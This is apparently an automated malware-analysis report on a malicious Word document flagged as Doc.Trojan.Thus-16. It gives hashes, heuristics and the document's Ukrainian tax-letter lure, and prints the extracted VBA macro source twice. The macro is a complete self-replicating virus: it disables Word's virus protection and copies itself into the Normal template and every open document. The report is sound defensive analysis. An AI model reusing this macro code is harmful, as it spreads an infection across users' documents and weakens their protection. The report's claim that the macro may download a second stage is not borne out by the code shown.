Office (OLE) malware analysis — malicious · 810800ab318fa50e

MALICIOUS

Office (OLE)

47.5 KB Created: 2001-11-12 16:27:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 35df0967465e89fe9972a4bb21b79fb2 SHA-1: ee79f531b50333df249d374079d72fb01e17f671 SHA-256: 810800ab318fa50e511fd1120a1bc23c49373c748d03ada6ff847f02da65b65b

220 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is a malicious Word document containing VBA macros, indicated by multiple OLE_VBA_* heuristic firings and ClamAV detection. The AutoOpen macro is designed to execute upon document opening, attempting to disable virus protection and potentially download a second-stage payload. The document body presents a seemingly official Ukrainian tax administration letter, serving as a lure to encourage macro execution.

Heuristics 6

ClamAV: Doc.Trojan.Thus-16 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Thus-16
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5725 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5725 bytes
SHA-256: `d5b87c56e80320218ae3c27e2cf7bded52fb18c50bc69cb60d8659029cd3b674`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'delta' Private Sub document_OPEN() On Error Resume Next If Application.Options.VirusProtection Then Application.Options.VirusProtection = Not Application.Options.VirusProtection healthsearch = "'delta'" First = False healthstr = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) If healthstr <> healthsearch Then First = True NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _ .deleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _ .CodeModule.CountOfLines NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _ .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _ .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _ .Item(1).CodeModule.CountOfLines) NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.deleteLines 44, 4 a1 = "Application.Documents.Item(K).VBProject.VBComponents.Item(1) _" b1 = ".CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _" c1 = ".Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _" d1 = ".VBComponents.Item(1).CodeModule.CountOfLines)" NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 44, a1 NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 45, b1 NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 46, c1 NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 47, d1 a1 = " ' '" b1 = " ' '" c1 = " ' '" d1 = " ' '" NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.deleteLines 14, 4 NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 14, a1 NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 15, b1 NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 16, c1 NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 17, d1 End If If NormalTemplate.Saved = False Then NormalTemplate.Save If Not First Then For K = 1 To Application.Documents.Count If Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> healthsearch Then Application.Documents.Item(K).VBProject.VBComponents.Item(1) _ .CodeModule.deleteLines 1, Application.Documents.Item(K) _ .VBProject.VBComponents.Item(1).CodeModule.CountOfLines ' ' ' ' ' ' ' ' Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.deleteLines 14, 4 a1 = "NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _" b1 = ".InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _" c1 = ".CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _" d1 = ".Item(1).CodeModule.CountOfLines)" Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 14, a1 Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 15, b1 Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 16, c1 Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 17, d1 a1 = " ' '" b1 = " ' '" c1 = " ' '" d1 = " ' '" Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.deleteLines 44, 4 Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 44, a1 Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 45, b1 Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 46, c1 Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 47, d1 End If Next K End If If (Month(Date) = 12) And (Day(Date) = 28) Then Application.Quit SaveChanges:=wdSaveChanges End Sub Private Sub document_close() document_OPEN End Sub Private Sub document_new() document_OPEN End Sub ... (truncated)

SHA-256: d5b87c56e80320218ae3c27e2cf7bded52fb18c50bc69cb60d8659029cd3b674

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'delta'
Private Sub document_OPEN()
    On Error Resume Next
    If Application.Options.VirusProtection Then Application.Options.VirusProtection = Not Application.Options.VirusProtection
    healthsearch = "'delta'"
    First = False
    healthstr = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
    If healthstr <> healthsearch Then
     First = True
     NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .deleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .CodeModule.CountOfLines
  
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
.InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
.CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
.Item(1).CodeModule.CountOfLines)
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.deleteLines 44, 4
a1 = "Application.Documents.Item(K).VBProject.VBComponents.Item(1) _"
b1 = ".CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _"
c1 = ".Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _"
d1 = ".VBComponents.Item(1).CodeModule.CountOfLines)"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 44, a1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 45, b1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 46, c1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 47, d1
a1 = " ' '"
b1 = " ' '"
c1 = " ' '"
d1 = " ' '"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.deleteLines 14, 4
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 14, a1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 15, b1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 16, c1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines 17, d1
    End If
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    If Not First Then
    For K = 1 To Application.Documents.Count
    If Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> healthsearch Then
    Application.Documents.Item(K).VBProject.VBComponents.Item(1) _
    .CodeModule.deleteLines 1, Application.Documents.Item(K) _
    .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
 ' '
 ' '
 ' '
 ' '

Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.deleteLines 14, 4
a1 = "NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _"
b1 = ".InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _"
c1 = ".CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _"
d1 = ".Item(1).CodeModule.CountOfLines)"
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 14, a1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 15, b1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 16, c1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 17, d1
a1 = " ' '"
b1 = " ' '"
c1 = " ' '"
d1 = " ' '"
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.deleteLines 44, 4
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 44, a1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 45, b1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 46, c1
Application.Documents.Item(K).VBProject.VBComponents.Item(1).CodeModule.InsertLines 47, d1
    End If
     Next K
    End If
    If (Month(Date) = 12) And (Day(Date) = 28) Then Application.Quit SaveChanges:=wdSaveChanges
   End Sub
Private Sub document_close()
document_OPEN
End Sub
Private Sub document_new()
document_OPEN
End Sub




















... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.